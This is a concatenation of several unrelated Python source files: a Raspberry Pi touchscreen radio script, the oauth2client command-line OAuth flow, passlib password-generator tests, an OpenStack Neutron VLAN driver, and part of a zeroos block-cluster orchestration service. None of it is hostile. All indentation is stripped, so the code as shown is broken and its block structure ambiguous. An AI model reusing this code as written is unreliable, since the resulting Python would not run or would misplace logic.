pygame.mouse.set_visible(False)
#define font
# the original script was using default font but I prefer droidsans
#font = pygame.font.Font(None, 25)
font = pygame.font.Font(pygame.font.match_font('droidsans'), 18)
#Added a large font to dislay time
fontLarge = pygame.font.Font(pygame.font.match_font('droidsans'), 54)
#screensaver
screensaver_timer = 5 #time until screensaver will be enabled, in minutes
screensaver = False
#load default skin
menu = 1
skin_number = 4
max_skins = 4
font_color = cyan
skin1 = pygame.image.load("skins/skin_white_m1.png")
skin2 = pygame.image.load("skins/skin_white_m2.png")
skin = skin1
screen.blit(skin, (0, 0))
#initial volume settings
subprocess.call('mpc volume 75' , shell=True)
reboot_label = font.render("rebooting...", 1, (font_color))
poweroff_label = font.render("shutting down", 1, (font_color))
song_title = " "
playlist = " "
# If needed to live reboot
def reboot():
screen.fill(black)
screen.blit(reboot_label, (10, 100))
pygame.display.flip()
time.sleep(5)
GPIO.cleanup()
subprocess.call('mpc stop' , shell=True)
subprocess.call('reboot' , shell=True)
# to power off cleanly
def poweroff():
screen.fill(black)
screen.blit(poweroff_label, (10, 100))
pygame.display.flip()
time.sleep(5)
GPIO.cleanup()
subprocess.call('mpc stop' , shell=True)
subprocess.call('poweroff' , shell=True)
#copy playing title to favorite.txt
def favorite():
print song_title
f = open ('/var/www/favorite.txt' , 'a')
f.write('-' + song_title + '\n')
f.close()
#function runs if touchscreen was touched (and screensaver is disabled)
def on_touch():
#x_min x_max y_min y_max
if 12 <= pos[0] <= 71 and 179 <= pos[1] <= 239:
#print "button1 was pressed"
button(1)
if 99 <= pos[0] <= 158 and 179 <= pos[1] <= 239:
#print "button2 was pressed"
button(2)
if 186 <= pos[0] <= 245 and 179 <= pos[1] <= 239:
#print "button3 was pressed"
button(3)
if 273 <= pos[0] <= 332 and 179 <= pos[1] <= 239:
#print "button4 was pressed"
button(4)
if 12 <= pos[0] <= 71 and 250 <= pos[1] <= 310:
#print "button5 was pressed"
button(5)
if 99 <= pos[0] <= 158 and 250 <= pos[1] <= 310:
#print "button6 was pressed"
button(6)
if 186 <= pos[0] <= 245 and 250 <= pos[1] <= 310:
#print "button7 was pressed"
button(7)
if 273 <= pos[0] <= 332 and 250 <= pos[1] <= 310:
#print "button8 was pressed"
button(8)
#which button (in which menu) was presed on touch
def button(number):
global menu
if menu == 1:
if number == 1:
subprocess.call('mpc play' , shell=True)
#print "play"
if number == 2:
subprocess.call('mpc pause' , shell=True)
#print "pause"
if number == 3:
subprocess.call('mpc volume +5' , shell=True)
#print "vol +x"
if number == 4:
subprocess.call('mpc volume 0' , shell=True)
#print "vol 0"
if number == 5:
subprocess.call('mpc prev' , shell=True)
#print "prev"
if number == 6:
subprocess.call('mpc next' , shell=True)
#print "next"
if number == 7:
subprocess.call('mpc volume -5' , shell=True)
#print "vol -x"
if number == 8:
#print "go to menu 2"
menu = 2
update_screen()
return
if menu == 2:
if number == 1:
# no more used
#favorite()
# used during development to display available fonts
#print(pygame.font.get_fonts())
update_screen()
if number == 2:
#print "switch skin"
global skin_number
skin_number = skin_number+1
#print skin_number
update_screen()
if number == 3:
#print "run in background"
pygame.quit()
sys.exit()
if number == 4:
#print "quit radio"
subprocess.call('mpc stop', shell=True)
pygame.quit()
sys.exit()
if number == 5:
print "power off"
poweroff()
if number == 6:
print "reboot"
reboot()
if number == 7:
#print "update screen"
update_screen()
if number == 8:
#print "go to menu 1"
menu = 1
update_screen()
return
#function to update screen
def update_screen():
global skin_number
if skin_number == max_skins+1:
skin_number = 1
#load skin, select font color in accordance
if skin_number == 1:
skin1 = pygame.image.load("skins/skin_blue_m1.png")
skin2 = pygame.image.load("skins/skin_blue_m2.png")
font_color = cyan
if skin_number == 2:
skin1 = pygame.image.load("skins/skin_orange_m1.png")
skin2 = pygame.image.load("skins/skin_orange_m2.png")
font_color = orange
if skin_number == 3:
skin1 = pygame.image.load("skins/skin_red_m1.png")
skin2 = pygame.image.load("skins/skin_red_m2.png")
font_color = red
if skin_number == 4:
skin1 = pygame.image.load("skins/skin_white_m1.png")
skin2 = pygame.image.load("skins/skin_white_m2.png")
font_color = white
global menu
if screensaver == False:
# render date and time
current_time = datetime.datetime.now().strftime('%H:%M')
time_label = fontLarge.render(current_time, 1, (font_color))
current_time = datetime.datetime.now().strftime('%d.%m.%Y')
date_label = font.render(current_time, 1, (font_color))
# display skin menu
if menu == 1:
skin = skin1
screen.blit(skin, (0, 0))
# get radio information
lines = subprocess.check_output('mpc current', shell=True).split(":")
if len(lines) == 1:
line1 = lines[0]
line1 = line1[:-1]
station_label = font.render("Station: no data", 1, (font_color))
else:
line1 = lines[0]
line2 = lines[1]
line1 = line1[:30]
station_label = font.render('Station: ' + line1 + '.', 1, (font_color))
# get title information
lines = subprocess.check_output('mpc -f [%title%]', shell=True).split("\n")
line1 = lines[0]
if line1.startswith("volume"):
title_label = font.render("Title: no data! Try with PLAY!", 1, (font_color))
else:
line1 = lines[0]
line2 = lines[1]
global song_title
song_title = line1
line1 = line1[:30]
title_label = font.render(line1 + '.', 1, (font_color))
title = font.render("Now playing:", 1, (font_color))
# draw screen
screen.blit(skin, (0, 0))
screen.blit(station_label, (23, 15))
screen.blit(title, (23, 40))
screen.blit(title_label, (23, 60))
screen.blit(date_label, (23, 132))
screen.blit(time_label, (190,100))
lines = subprocess.check_output('mpc volume', shell=True).split("\n")
line1 = lines[0]
volume_label = font.render(line1, 1, (font_color))
screen.blit(volume_label, (23, 102))
# flip screen buffer to update display
pygame.display.flip()
if menu == 2:
skin = skin2
screen.blit(skin, (0, 0))
# display NetRadio version
radioVersion = font.render('NetRadio V'+__VERSION__+'.'+__RELEASE__, 1, (font_color))
screen.blit(radioVersion, (23, 15))
#get and display ip
ip = subprocess.check_output('hostname -I', shell=True).strip()
ip_label = font.render('IP: ' + ip, 1, (font_color))
screen.blit(ip_label, (23, 35))
#get and display cpu temp
cpu_temp = subprocess.check_output('/opt/vc/bin/vcgencmd measure_temp', shell=True).strip()
temp = font.render('cpu ' + cpu_temp, 1, (font_color))
screen.blit(temp, (23, 55))
#display current time
screen.blit(date_label, (23, 132))
screen.blit(time_label, (190, 100))
# flip screen buffer to update display
pygame.display.flip()
# if screensaver is active
if screensaver == True:
screen.fill(black)
pygame.display.flip()
minutes = 0
#userevent on every 1000ms, used for screensaver
pygame.time.set_timer(USEREVENT +1, 60000)
# start player
subprocess.call('mpc play' , shell=True)
update_screen()
running = True
while running:
for event in pygame.event.get():
# every minute we update minutes counter
if event.type == USEREVENT +1 and menu == 1:
minutes += 1
# different ways to exit
if event.type == pygame.QUIT:
GPIO.cleanup()
print "Quit radio"
GPIO.cleanup()
pygame.quit()
sys.exit()
if event.type == pygame.KEYDOWN:
if event.key == K_ESCAPE:
GPIO.cleanup()
print "Quit radio"
GPIO.cleanup()
pygame.quit()
sys.exit()
#if screensaver is enabled and the screen was touched,
#just disable screensaver, reset timer and update screen
#no button state will be checked
if event.type == pygame.MOUSEBUTTONDOWN and screensaver == True:
minutes = 0
GPIO.output(18, GPIO.HIGH)
screensaver = False
update_screen()
break
#if screen was touched and screensaver is disabled,
#get position of touched button, call on_touch(), reset timer and update screen
if event.type == pygame.MOUSEBUTTONDOWN and screensaver == False:
pos = (pygame.mouse.get_pos() [0], pygame.mouse.get_pos() [1])
minutes = 0
on_touch()
update_screen()
#enable screensaver on timer overflow
if minutes > screensaver_timer:
screensaver = True
GPIO.output(18, GPIO.LOW)
update_screen()
# update screen every 0.1 second to keep title info updated
update_screen()
time.sleep(0.1)
| |
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command-line tools for authenticating via OAuth 2.0
Do the OAuth 2.0 Web Server dance for a command line application. Stores the
generated credentials in a common file that is used by other example apps in
the same directory.
"""
from __future__ import print_function
import logging
import socket
import sys
from six.moves import BaseHTTPServer
from six.moves import urllib
from six.moves import input
from oauth2client import client
from oauth2client import util
__author__ = 'jcgregorio@google.com (Joe Gregorio)'
__all__ = ['argparser', 'run_flow', 'message_if_missing']
_CLIENT_SECRETS_MESSAGE = """WARNING: Please configure OAuth 2.0
To make this sample run you will need to populate the client_secrets.json file
found at:
%s
with information from the APIs Console <https://code.google.com/apis/console>.
"""
def _CreateArgumentParser():
try:
import argparse
except ImportError:
return None
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('--auth_host_name', default='localhost',
help='Hostname when running a local web server.')
parser.add_argument('--noauth_local_webserver', action='store_true',
default=False, help='Do not run a local web server.')
parser.add_argument('--auth_host_port', default=[8080, 8090], type=int,
nargs='*', help='Port web server should listen on.')
parser.add_argument(
'--logging_level', default='ERROR',
choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'],
help='Set the logging level of detail.')
return parser
# argparser is an ArgumentParser that contains command-line options expected
# by tools.run(). Pass it in as part of the 'parents' argument to your own
# ArgumentParser.
argparser = _CreateArgumentParser()
class ClientRedirectServer(BaseHTTPServer.HTTPServer):
"""A server to handle OAuth 2.0 redirects back to localhost.
Waits for a single request and parses the query parameters
into query_params and then stops serving.
"""
query_params = {}
class ClientRedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""A handler for OAuth 2.0 redirects back to localhost.
Waits for a single request and parses the query parameters
into the servers query_params and then stops serving.
"""
def do_GET(self):
"""Handle a GET request.
Parses the query parameters and prints a message
if the flow has completed. Note that we can't detect
if an error occurred.
"""
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
query = self.path.split('?', 1)[-1]
query = dict(urllib.parse.parse_qsl(query))
self.server.query_params = query
self.wfile.write(
b"<html><head><title>Authentication Status</title></head>")
self.wfile.write(
b"<body><p>The authentication flow has completed.</p>")
self.wfile.write(b"</body></html>")
def log_message(self, format, *args):
"""Do not log messages to stdout while running as cmd. line program."""
@util.positional(3)
def run_flow(flow, storage, flags, http=None):
"""Core code for a command-line application.
The ``run()`` function is called from your application and runs
through all the steps to obtain credentials. It takes a ``Flow``
argument and attempts to open an authorization server page in the
user's default web browser. The server asks the user to grant your
application access to the user's data. If the user grants access,
the ``run()`` function returns new credentials. The new credentials
are also stored in the ``storage`` argument, which updates the file
associated with the ``Storage`` object.
It presumes it is run from a command-line application and supports the
following flags:
``--auth_host_name`` (string, default: ``localhost``)
Host name to use when running a local web server to handle
redirects during OAuth authorization.
``--auth_host_port`` (integer, default: ``[8080, 8090]``)
Port to use when running a local web server to handle redirects
during OAuth authorization. Repeat this option to specify a list
of values.
``--[no]auth_local_webserver`` (boolean, default: ``True``)
Run a local web server to handle redirects during OAuth
authorization.
The tools module defines an ``ArgumentParser`` the already contains the
flag definitions that ``run()`` requires. You can pass that
``ArgumentParser`` to your ``ArgumentParser`` constructor::
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter,
parents=[tools.argparser])
flags = parser.parse_args(argv)
Args:
flow: Flow, an OAuth 2.0 Flow to step through.
storage: Storage, a ``Storage`` to store the credential in.
flags: ``argparse.Namespace``, The command-line flags. This is the
object returned from calling ``parse_args()`` on
``argparse.ArgumentParser`` as described above.
http: An instance of ``httplib2.Http.request`` or something that
acts like it.
Returns:
Credentials, the obtained credential.
"""
logging.getLogger().setLevel(getattr(logging, flags.logging_level))
if not flags.noauth_local_webserver:
success = False
port_number = 0
for port in flags.auth_host_port:
port_number = port
try:
httpd = ClientRedirectServer((flags.auth_host_name, port),
ClientRedirectHandler)
except socket.error:
pass
else:
success = True
break
flags.noauth_local_webserver = not success
if not success:
print('Failed to start a local webserver listening '
'on either port 8080')
print('or port 9090. Please check your firewall settings and locally')
print('running programs that may be blocking or using those ports.')
print()
print('Falling back to --noauth_local_webserver and continuing with')
print('authorization.')
print()
if not flags.noauth_local_webserver:
oauth_callback = 'http://%s:%s/' % (flags.auth_host_name, port_number)
else:
oauth_callback = client.OOB_CALLBACK_URN
flow.redirect_uri = oauth_callback
authorize_url = flow.step1_get_authorize_url()
if not flags.noauth_local_webserver:
import webbrowser
webbrowser.open(authorize_url, new=1, autoraise=True)
print('Your browser has been opened to visit:')
print()
print(' ' + authorize_url)
print()
print('If your browser is on a different machine then '
'exit and re-run this')
print('application with the command-line parameter ')
print()
print(' --noauth_local_webserver')
print()
else:
print('Go to the following link in your browser:')
print()
print(' ' + authorize_url)
print()
code = None
if not flags.noauth_local_webserver:
httpd.handle_request()
if 'error' in httpd.query_params:
sys.exit('Authentication request was rejected.')
if 'code' in httpd.query_params:
code = httpd.query_params['code']
else:
print('Failed to find "code" in the query parameters '
'of the redirect.')
sys.exit('Try running with --noauth_local_webserver.')
else:
code = input('Enter verification code: ').strip()
try:
credential = flow.step2_exchange(code, http=http)
except client.FlowExchangeError as e:
sys.exit('Authentication has failed: %s' % e)
storage.put(credential)
credential.set_store(storage)
print('Authentication successful.')
return credential
def message_if_missing(filename):
"""Helpful message to display if the CLIENT_SECRETS file is missing."""
return _CLIENT_SECRETS_MESSAGE % filename
| |
"""passlib.tests -- tests for passlib.pwd"""
#=============================================================================
# imports
#=============================================================================
# core
import itertools
import logging; log = logging.getLogger(__name__)
# site
# pkg
from passlib.tests.utils import TestCase
# local
__all__ = [
"UtilsTest",
"GenerateTest",
"StrengthTest",
]
#=============================================================================
#
#=============================================================================
class UtilsTest(TestCase):
"""test internal utilities"""
descriptionPrefix = "passlib.pwd"
def test_self_info_rate(self):
"""_self_info_rate()"""
from passlib.pwd import _self_info_rate
self.assertEqual(_self_info_rate(""), 0)
self.assertEqual(_self_info_rate("a" * 8), 0)
self.assertEqual(_self_info_rate("ab"), 1)
self.assertEqual(_self_info_rate("ab" * 8), 1)
self.assertEqual(_self_info_rate("abcd"), 2)
self.assertEqual(_self_info_rate("abcd" * 8), 2)
self.assertAlmostEqual(_self_info_rate("abcdaaaa"), 1.5488, places=4)
# def test_total_self_info(self):
# """_total_self_info()"""
# from passlib.pwd import _total_self_info
#
# self.assertEqual(_total_self_info(""), 0)
#
# self.assertEqual(_total_self_info("a" * 8), 0)
#
# self.assertEqual(_total_self_info("ab"), 2)
# self.assertEqual(_total_self_info("ab" * 8), 16)
#
# self.assertEqual(_total_self_info("abcd"), 8)
# self.assertEqual(_total_self_info("abcd" * 8), 64)
# self.assertAlmostEqual(_total_self_info("abcdaaaa"), 12.3904, places=4)
#=============================================================================
# word generation
#=============================================================================
# import subject
from passlib.pwd import genword, default_charsets
ascii_62 = default_charsets['ascii_62']
hex = default_charsets['hex']
class WordGeneratorTest(TestCase):
"""test generation routines"""
descriptionPrefix = "passlib.pwd.genword()"
def setUp(self):
super(WordGeneratorTest, self).setUp()
# patch some RNG references so they're reproducible.
from passlib.pwd import SequenceGenerator
self.patchAttr(SequenceGenerator, "rng",
self.getRandom("pwd generator"))
def assertResultContents(self, results, count, chars, unique=True):
"""check result list matches expected count & charset"""
self.assertEqual(len(results), count)
if unique:
if unique is True:
unique = count
self.assertEqual(len(set(results)), unique)
self.assertEqual(set("".join(results)), set(chars))
def test_general(self):
"""general behavior"""
# basic usage
result = genword()
self.assertEqual(len(result), 9)
# malformed keyword should have useful error.
self.assertRaisesRegex(TypeError, "(?i)unexpected keyword.*badkwd", genword, badkwd=True)
def test_returns(self):
"""'returns' keyword"""
# returns=int option
results = genword(returns=5000)
self.assertResultContents(results, 5000, ascii_62)
# returns=iter option
gen = genword(returns=iter)
results = [next(gen) for _ in range(5000)]
self.assertResultContents(results, 5000, ascii_62)
# invalid returns option
self.assertRaises(TypeError, genword, returns='invalid-type')
def test_charset(self):
"""'charset' & 'chars' options"""
# charset option
results = genword(charset="hex", returns=5000)
self.assertResultContents(results, 5000, hex)
# chars option
# there are 3**3=27 possible combinations
results = genword(length=3, chars="abc", returns=5000)
self.assertResultContents(results, 5000, "abc", unique=27)
# chars + charset
self.assertRaises(TypeError, genword, chars='abc', charset='hex')
# TODO: test rng option
#=============================================================================
# phrase generation
#=============================================================================
# import subject
from passlib.pwd import genphrase
simple_words = ["alpha", "beta", "gamma"]
class PhraseGeneratorTest(TestCase):
"""test generation routines"""
descriptionPrefix = "passlib.pwd.genphrase()"
def assertResultContents(self, results, count, words, unique=True, sep=" "):
"""check result list matches expected count & charset"""
self.assertEqual(len(results), count)
if unique:
if unique is True:
unique = count
self.assertEqual(len(set(results)), unique)
out = set(itertools.chain.from_iterable(elem.split(sep) for elem in results))
self.assertEqual(out, set(words))
def test_general(self):
"""general behavior"""
# basic usage
result = genphrase()
self.assertEqual(len(result.split(" ")), 4) # 48 / log(7776, 2) ~= 3.7 -> 4
# malformed keyword should have useful error.
self.assertRaisesRegex(TypeError, "(?i)unexpected keyword.*badkwd", genphrase, badkwd=True)
def test_entropy(self):
"""'length' & 'entropy' keywords"""
# custom entropy
result = genphrase(entropy=70)
self.assertEqual(len(result.split(" ")), 6) # 70 / log(7776, 2) ~= 5.4 -> 6
# custom length
result = genphrase(length=3)
self.assertEqual(len(result.split(" ")), 3)
# custom length < entropy
result = genphrase(length=3, entropy=48)
self.assertEqual(len(result.split(" ")), 4)
# custom length > entropy
result = genphrase(length=4, entropy=12)
self.assertEqual(len(result.split(" ")), 4)
def test_returns(self):
"""'returns' keyword"""
# returns=int option
results = genphrase(returns=1000, words=simple_words)
self.assertResultContents(results, 1000, simple_words)
# returns=iter option
gen = genphrase(returns=iter, words=simple_words)
results = [next(gen) for _ in range(1000)]
self.assertResultContents(results, 1000, simple_words)
# invalid returns option
self.assertRaises(TypeError, genphrase, returns='invalid-type')
def test_wordset(self):
"""'wordset' & 'words' options"""
# wordset option
results = genphrase(words=simple_words, returns=5000)
self.assertResultContents(results, 5000, simple_words)
# words option
results = genphrase(length=3, words=simple_words, returns=5000)
self.assertResultContents(results, 5000, simple_words, unique=3**3)
# words + wordset
self.assertRaises(TypeError, genphrase, words=simple_words, wordset='bip39')
#=============================================================================
# eof
#=============================================================================
| |
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
from oslo.config import cfg
from six import moves
import sqlalchemy as sa
from neutron.common import constants as q_const
from neutron.common import exceptions as exc
from neutron.common import utils
from neutron.db import api as db_api
from neutron.db import model_base
from neutron.openstack.common import log
from neutron.plugins.common import constants as p_const
from neutron.plugins.common import utils as plugin_utils
from neutron.plugins.ml2 import driver_api as api
LOG = log.getLogger(__name__)
vlan_opts = [
cfg.ListOpt('network_vlan_ranges',
default=[],
help=_("List of <physical_network>:<vlan_min>:<vlan_max> or "
"<physical_network> specifying physical_network names "
"usable for VLAN provider and tenant networks, as "
"well as ranges of VLAN tags on each available for "
"allocation to tenant networks."))
]
cfg.CONF.register_opts(vlan_opts, "ml2_type_vlan")
class VlanAllocation(model_base.BASEV2):
"""Represent allocation state of a vlan_id on a physical network.
If allocated is False, the vlan_id on the physical_network is
available for allocation to a tenant network. If allocated is
True, the vlan_id on the physical_network is in use, either as a
tenant or provider network.
When an allocation is released, if the vlan_id for the
physical_network is inside the pool described by
VlanTypeDriver.network_vlan_ranges, then allocated is set to
False. If it is outside the pool, the record is deleted.
"""
__tablename__ = 'ml2_vlan_allocations'
physical_network = sa.Column(sa.String(64), nullable=False,
primary_key=True)
vlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False)
class VlanTypeDriver(api.TypeDriver):
"""Manage state for VLAN networks with ML2.
The VlanTypeDriver implements the 'vlan' network_type. VLAN
network segments provide connectivity between VMs and other
devices using any connected IEEE 802.1Q conformant
physical_network segmented into virtual networks via IEEE 802.1Q
headers. Up to 4094 VLAN network segments can exist on each
available physical_network.
"""
def __init__(self):
self._parse_network_vlan_ranges()
def _parse_network_vlan_ranges(self):
try:
self.network_vlan_ranges = plugin_utils.parse_network_vlan_ranges(
cfg.CONF.ml2_type_vlan.network_vlan_ranges)
# TODO(rkukura): Validate that each physical_network name
# is neither empty nor too long.
except Exception:
LOG.exception(_("Failed to parse network_vlan_ranges. "
"Service terminated!"))
sys.exit(1)
LOG.info(_("Network VLAN ranges: %s"), self.network_vlan_ranges)
def _sync_vlan_allocations(self):
session = db_api.get_session()
with session.begin(subtransactions=True):
# get existing allocations for all physical networks
allocations = dict()
allocs = (session.query(VlanAllocation).
with_lockmode('update'))
for alloc in allocs:
if alloc.physical_network not in allocations:
allocations[alloc.physical_network] = set()
allocations[alloc.physical_network].add(alloc)
# process vlan ranges for each configured physical network
for (physical_network,
vlan_ranges) in self.network_vlan_ranges.items():
# determine current configured allocatable vlans for
# this physical network
vlan_ids = set()
for vlan_min, vlan_max in vlan_ranges:
vlan_ids |= set(moves.xrange(vlan_min, vlan_max + 1))
# remove from table unallocated vlans not currently
# allocatable
if physical_network in allocations:
for alloc in allocations[physical_network]:
try:
# see if vlan is allocatable
vlan_ids.remove(alloc.vlan_id)
except KeyError:
# it's not allocatable, so check if its allocated
if not alloc.allocated:
# it's not, so remove it from table
LOG.debug(_("Removing vlan %(vlan_id)s on "
"physical network "
"%(physical_network)s from pool"),
{'vlan_id': alloc.vlan_id,
'physical_network':
physical_network})
session.delete(alloc)
del allocations[physical_network]
# add missing allocatable vlans to table
for vlan_id in sorted(vlan_ids):
alloc = VlanAllocation(physical_network=physical_network,
vlan_id=vlan_id,
allocated=False)
session.add(alloc)
# remove from table unallocated vlans for any unconfigured
# physical networks
for allocs in allocations.itervalues():
for alloc in allocs:
if not alloc.allocated:
LOG.debug(_("Removing vlan %(vlan_id)s on physical "
"network %(physical_network)s from pool"),
{'vlan_id': alloc.vlan_id,
'physical_network':
alloc.physical_network})
session.delete(alloc)
def get_type(self):
return p_const.TYPE_VLAN
def initialize(self):
self._sync_vlan_allocations()
LOG.info(_("VlanTypeDriver initialization complete"))
def validate_provider_segment(self, segment):
physical_network = segment.get(api.PHYSICAL_NETWORK)
if not physical_network:
msg = _("physical_network required for VLAN provider network")
raise exc.InvalidInput(error_message=msg)
if physical_network not in self.network_vlan_ranges:
msg = (_("physical_network '%s' unknown for VLAN provider network")
% physical_network)
raise exc.InvalidInput(error_message=msg)
segmentation_id = segment.get(api.SEGMENTATION_ID)
if segmentation_id is None:
msg = _("segmentation_id required for VLAN provider network")
raise exc.InvalidInput(error_message=msg)
if not utils.is_valid_vlan_tag(segmentation_id):
msg = (_("segmentation_id out of range (%(min)s through "
"%(max)s)") %
{'min': q_const.MIN_VLAN_TAG,
'max': q_const.MAX_VLAN_TAG})
raise exc.InvalidInput(error_message=msg)
for key, value in segment.items():
if value and key not in [api.NETWORK_TYPE,
api.PHYSICAL_NETWORK,
api.SEGMENTATION_ID]:
msg = _("%s prohibited for VLAN provider network") % key
raise exc.InvalidInput(error_message=msg)
def reserve_provider_segment(self, session, segment):
physical_network = segment[api.PHYSICAL_NETWORK]
vlan_id = segment[api.SEGMENTATION_ID]
with session.begin(subtransactions=True):
try:
alloc = (session.query(VlanAllocation).
filter_by(physical_network=physical_network,
vlan_id=vlan_id).
with_lockmode('update').
one())
if alloc.allocated:
raise exc.VlanIdInUse(vlan_id=vlan_id,
physical_network=physical_network)
LOG.debug(_("Reserving specific vlan %(vlan_id)s on physical "
"network %(physical_network)s from pool"),
{'vlan_id': vlan_id,
'physical_network': physical_network})
alloc.allocated = True
except sa.orm.exc.NoResultFound:
LOG.debug(_("Reserving specific vlan %(vlan_id)s on physical "
"network %(physical_network)s outside pool"),
{'vlan_id': vlan_id,
'physical_network': physical_network})
alloc = VlanAllocation(physical_network=physical_network,
vlan_id=vlan_id,
allocated=True)
session.add(alloc)
def allocate_tenant_segment(self, session):
with session.begin(subtransactions=True):
alloc = (session.query(VlanAllocation).
filter_by(allocated=False).
with_lockmode('update').
first())
if alloc:
LOG.debug(_("Allocating vlan %(vlan_id)s on physical network "
"%(physical_network)s from pool"),
{'vlan_id': alloc.vlan_id,
'physical_network': alloc.physical_network})
alloc.allocated = True
return {api.NETWORK_TYPE: p_const.TYPE_VLAN,
api.PHYSICAL_NETWORK: alloc.physical_network,
api.SEGMENTATION_ID: alloc.vlan_id}
def release_segment(self, session, segment):
physical_network = segment[api.PHYSICAL_NETWORK]
vlan_id = segment[api.SEGMENTATION_ID]
with session.begin(subtransactions=True):
try:
alloc = (session.query(VlanAllocation).
filter_by(physical_network=physical_network,
vlan_id=vlan_id).
with_lockmode('update').
one())
alloc.allocated = False
inside = False
for vlan_min, vlan_max in self.network_vlan_ranges.get(
physical_network, []):
if vlan_min <= vlan_id <= vlan_max:
inside = True
break
if not inside:
session.delete(alloc)
LOG.debug(_("Releasing vlan %(vlan_id)s on physical "
"network %(physical_network)s outside pool"),
{'vlan_id': vlan_id,
'physical_network': physical_network})
else:
LOG.debug(_("Releasing vlan %(vlan_id)s on physical "
"network %(physical_network)s to pool"),
{'vlan_id': vlan_id,
'physical_network': physical_network})
except sa.orm.exc.NoResultFound:
LOG.warning(_("No vlan_id %(vlan_id)s found on physical "
"network %(physical_network)s"),
{'vlan_id': vlan_id,
'physical_network': physical_network})
| |
from js9 import j
def input(job):
for arg in ['filesystems', 'arbds']:
if job.model.args.get(arg, []) != []:
raise j.exceptions.Input("{} should not be set as input".format(arg))
nodes = job.model.args.get('nodes', [])
nrserver = job.model.args.get('nrServer', 0)
if len(nodes) == 0:
raise j.exceptions.Input("Invalid amount of nodes provided")
if nrserver % len(nodes) != 0:
raise j.exceptions.Input("Invalid spread provided can not evenly spread servers over amount of nodes")
etcd_clusters = job.service.aysrepo.servicesFind(role='etcd_cluster')
if not etcd_clusters:
raise j.exceptions.Input('No etcd cluster service found.')
return job.model.args
def get_cluster(job):
from zeroos.orchestrator.configuration import get_jwt_token
from zeroos.orchestrator.sal.StorageCluster import BlockCluster
job.context['token'] = get_jwt_token(job.service.aysrepo)
return BlockCluster.from_ays(job.service, job.context['token'])
def init(job):
from zeroos.orchestrator.sal.Node import Node
from zeroos.orchestrator.sal.StorageCluster import BlockCluster
from zeroos.orchestrator.configuration import get_configuration
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
nodes = set()
for node_service in service.producers['node']:
nodes.add(Node.from_ays(node_service, job.context['token']))
nodes = list(nodes)
nodemap = {node.name: node for node in nodes}
availabledisks = get_availabledisks(job)
blockcluster_sal = BlockCluster.from_ays(service, job.context['token'])
datadisks = blockcluster_sal.get_disks(availabledisks)
# lets create some services
spactor = service.aysrepo.actorGet("storagepool")
fsactor = service.aysrepo.actorGet("filesystem")
containeractor = service.aysrepo.actorGet("container")
storageEngineActor = service.aysrepo.actorGet("storage_engine")
filesystems = []
storageEngines = []
def create_server(node, disk, baseport, tcp):
diskmap = [{'device': disk.devicename}]
args = {
'node': node.name,
'metadataProfile': 'single',
'dataProfile': 'single',
'devices': diskmap
}
storagepoolname = 'cluster_{}_{}_{}'.format(node.name, service.name, disk.name)
spservice = spactor.serviceCreate(instance=storagepoolname, args=args)
service.consume(spservice)
containername = '{}_{}'.format(storagepoolname, baseport)
# adding filesystem
args = {
'storagePool': storagepoolname,
'name': containername,
}
fs_service = fsactor.serviceCreate(instance=containername, args=args)
filesystems.append(fs_service)
config = get_configuration(job.service.aysrepo)
service.consume(fs_service)
# create containers
args = {
'node': node.name,
'hostname': containername,
'flist': config.get('storage-engine-flist', 'https://hub.gig.tech/gig-official-apps/ardb-rocksdb.flist'),
'mounts': [{'filesystem': containername, 'target': '/mnt/data'}],
'hostNetworking': True
}
containeractor.serviceCreate(instance=containername, args=args)
# create storageEngines
args = {
'homeDir': '/mnt/data',
'bind': '{}:{}'.format(node.storageAddr, baseport),
'container': containername
}
storageEngine = storageEngineActor.serviceCreate(instance=containername, args=args)
storageEngine.consume(tcp)
storageEngines.append(storageEngine)
for nodename, disks in datadisks.items():
node = nodemap[nodename]
# making the storagepool
nrports = len(disks)
baseports, tcpservices = get_baseports(job, node, baseport=2000, nrports=nrports)
for idx, disk in enumerate(disks):
create_server(node, disk, baseports[idx], tcpservices[idx])
service.model.data.init('filesystems', len(filesystems))
service.model.data.init('storageServers', len(storageEngines))
for index, fs in enumerate(filesystems):
service.consume(fs)
service.model.data.filesystems[index] = fs.name
for index, storageEngine in enumerate(storageEngines):
service.consume(storageEngine)
service.model.data.storageServers[index] = storageEngine.name
grafanasrv = service.aysrepo.serviceGet(role='grafana', instance='statsdb', die=False)
if grafanasrv:
import json
from zeroos.orchestrator.sal.StorageCluster import StorageDashboard
board = StorageDashboard(service).dashboard_template()
board = json.dumps(board)
dashboard_actor = service.aysrepo.actorGet('dashboard')
args = {
'grafana': 'statsdb',
'dashboard': board
}
dashboardsrv = dashboard_actor.serviceCreate(instance=service.name, args=args)
service.consume(dashboardsrv)
job.service.model.data.status = 'empty'
def save_config(job):
import yaml
from zeroos.orchestrator.sal.StorageCluster import BlockCluster
from zeroos.orchestrator.sal.ETCD import EtcdCluster
from zeroos.orchestrator.configuration import get_jwt_token
job.context['token'] = get_jwt_token(job.service.aysrepo)
service = job.service
etcd_clusters = job.service.aysrepo.servicesFind(role='etcd_cluster')
if not etcd_clusters:
j.exceptions.RuntimeError('No etcd cluster found')
etcd_cluster = etcd_clusters[0]
